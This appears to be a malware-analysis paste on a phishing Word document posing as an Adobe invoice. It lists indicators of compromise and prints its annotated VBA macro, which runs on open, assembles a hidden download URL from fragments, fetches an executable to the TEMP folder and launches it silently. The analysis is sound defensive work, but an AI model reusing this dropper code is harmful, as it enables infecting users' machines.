Snakelabs

f8b521fb58d02915b9748374f653ba70

Oct 6th, 2014
  1. New Adobe Invoice.doc
  2. MD5: 12a589d6d306f4e888847f127b8ab5ee
  3. VT: https://www.virustotal.com/en/file/55f06751b22dd5c17bcce7ab9e9da59dcabd3840ab089fe8b800c8aebbf1f3f5/analysis/
  4.  
  5. Macro downloads from URL: hxxp://keshmoney[.]su/adobe[.]php
  6. IP: 94.102.52.186
  7. https://www.projecthoneypot.org/ip_94.102.52.186
  8. https://www.virustotal.com/en/ip-address/94.102.52.186/information/
  9.  
  10. Dropped: 1.exe
  11. MD5: f8b521fb58d02915b9748374f653ba70
  12. VT: https://www.virustotal.com/en/file/ac5ff0806a382593bac3f22ab4038dfbe0a9efaaa39dcd5207ab7917b012a67a/analysis/1412584016/
  13.  
  14. @Malwr (Welcome Back): https://malwr.com/analysis/OWI0YzEzNGU0ZWIwNDQxYmJlMWJmOWViZTgyNzRkNzE/
  15.  
  16. Dropped files:
  17. variometer.dll - 6a2ab204068c4eb3b02810384afe58b0
  18. https://malwr.com/analysis/ZTMyZjE1NjNmZDkxNDZkOThiYTAxMjNkYjgyN2NlZGE/#
  19. https://www.virustotal.com/en/file/52355804db4fd57c21cb8c79b148616c6cc889685e0e5986b7c050554bfa298d/analysis/1412685680/
  20.  
  21. variometer.h - 54884c54da9b136c9a5f6bfab2fad0f7
  22. https://www.virustotal.com/en/file/5b3d1e4b214cfd34dd69903bb790aab7ec42e6b799f8ed695a3a6a46f1e76b1c/analysis/
  23. https://malwr.com/analysis/MGQwM2Q2ZWI1MWMxNDc5Njk1N2UxYjEzM2Q5MmQxMTE/
  24.  
  25. ~~~~~~~~~~~~~~~MACRO~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
  26.  
  27. Attribute VB_Name = "ThisDocument"
  28. Attribute VB_Base = "1Normal.ThisDocument"
  29. Attribute VB_GlobalNameSpace = False
  30. Attribute VB_Creatable = False
  31. Attribute VB_PredeclaredId = True
  32. Attribute VB_Exposed = True
  33. Attribute VB_TemplateDerived = True
  34. Attribute VB_Customizable = True
  35. ByVal GeBiKVj35 As String, _
  36. ByVal LeMCQnPgP As Long, _
  37. ByVal SOIrsyJYk As Long) As Long
      ' NOTE(review): these three lines are only the tail of a declaration; its
      ' opening (keyword, name, library, leading parameters) is missing from the
      ' paste. The one name called below that is defined nowhere in the listing is
      ' Hdfr45iuoyr, invoked as (0, url, local path, 0, 0). That shape is consistent
      ' with an imported urlmon URLDownloadToFile-style API, but the paste does not
      ' show it - confirm against the original sample before relying on this.
  38.  
  39. Sub SiGa4rtiongi()
      ' Pure indirection: does nothing except forward to C0rlinge34. Every entry
      ' point in this module funnels through here.
  40. C0rlinge34
  41. End Sub
  42. Sub Auto_Open()
      ' Auto-run entry point by name (Auto_Open is the Excel-style spelling).
      ' Only forwards to SiGa4rtiongi.
  43. SiGa4rtiongi
  44. End Sub
  45. Sub AutoOpen()
      ' AutoOpen is the macro name Word runs when the document is opened with
      ' macros enabled; this is how the chain starts without further user action.
      ' Triage note: the presence of AutoOpen/Auto_Open in an e-mailed .doc is
      ' itself worth flagging.
  46. Auto_Open
  47. End Sub
  48.  
  49. Sub G4wringro(asd As String)
      ' Download-and-run stage. asd is the URL string handed over by C0rlinge34.
  50. Dim p0tngou3yor As String
  51.  
      ' Target directory is the user's TEMP folder, taken from the environment.
  52. p0tngou3yor = Environ("TEMP")
      ' Hdfr45iuoyr is not defined in the visible listing (its declaration is cut
      ' off in the paste). Given the "Macro download from url" note in the header
      ' and the arguments used, it presumably fetches asd and writes the response
      ' to %TEMP%\rsrs.exe - confirm against the original sample.
  53. Hdfr45iuoyr 0, asd, p0tngou3yor & "\" & "rsrs.exe", 0, 0
  54.  
      ' Launches the written file with vbHide, i.e. with no visible window.
      ' The return value of the previous call is not checked before this runs.
      ' Detection note: the observable behaviour is an Office process creating and
      ' then starting an .exe under %TEMP%. The on-disk name used here is rsrs.exe,
      ' while the header lists the dropped sample as 1.exe - possibly just the
      ' name it was submitted under (unverified).
  55. Shell p0tngou3yor & "\" & "rsrs.exe", vbHide
  56. End Sub
  57.  
  58. Sub asdsadadasdasdsadasdasdsadasdasdasdsadasdasdasdasdasdsadasdsasdassad()
      ' Empty procedure with no statements, never called in the visible listing.
      ' Presumably junk padding to alter the module's content - has no effect.
  59.  
  60. End Sub
  61. Sub C0rlinge34()
      ' Main routine: clears any earlier copy of the payload, assembles the
      ' download URL from fragments, and hands it to G4wringro.
      ' On Error Resume Next silences every runtime error in this Sub, so the
      ' Kill below does not stop the macro when the file does not exist yet.
  62. On Error Resume Next
  63. Dim sendie45uis As String
      ' The next five declared strings are never assigned or read in the visible
      ' code - filler that only changes how the module looks.
  64. Dim a As String
  65. Dim aa As String
  66. Dim jadsadasjdajsdjasdjas As String
  67. Dim asdjasdjas9ddnasudiasbdiasud As String: Dim asadjasdasdasdasd As String
  68. sendie45uis = Environ("TEMP")
      ' Deletes a previous %TEMP%\rsrs.exe before a fresh one is written.
  69. Kill sendie45uis & "\rsrs.exe"
  70. Dim Sgwamyu64 As String
      ' The URL is built by concatenating short literals, so the full host name
      ' never appears as one string in the macro source; a plain string search
      ' of the document for the domain will miss it. The assembled value matches
      ' the defanged URL given in the header (hxxp://keshmoney[.]su/adobe[.]php).
  71. Sgwamyu64 = "http:" & "//" & "keshm" & "oney" & ".su/" & "ad" & "obe" & ".php"
  72.  
      ' Replace strips spaces; the string built above contains none, so this is
      ' a no-op for the value shown here.
  73. Call G4wringro(Replace(Sgwamyu64, " ", ""))
  74.  
  75. End Sub
  76.  
  77. Sub GLsapqirr()
      ' Another alias into the same chain via SiGa4rtiongi. Nothing in the visible
      ' listing calls it.
  78. SiGa4rtiongi
  79. End Sub
  80. Sub FTBgUhEPj()
      ' Same as GLsapqirr: forwards to SiGa4rtiongi and is not called anywhere in
      ' the visible listing.
  81. SiGa4rtiongi
  82. End Sub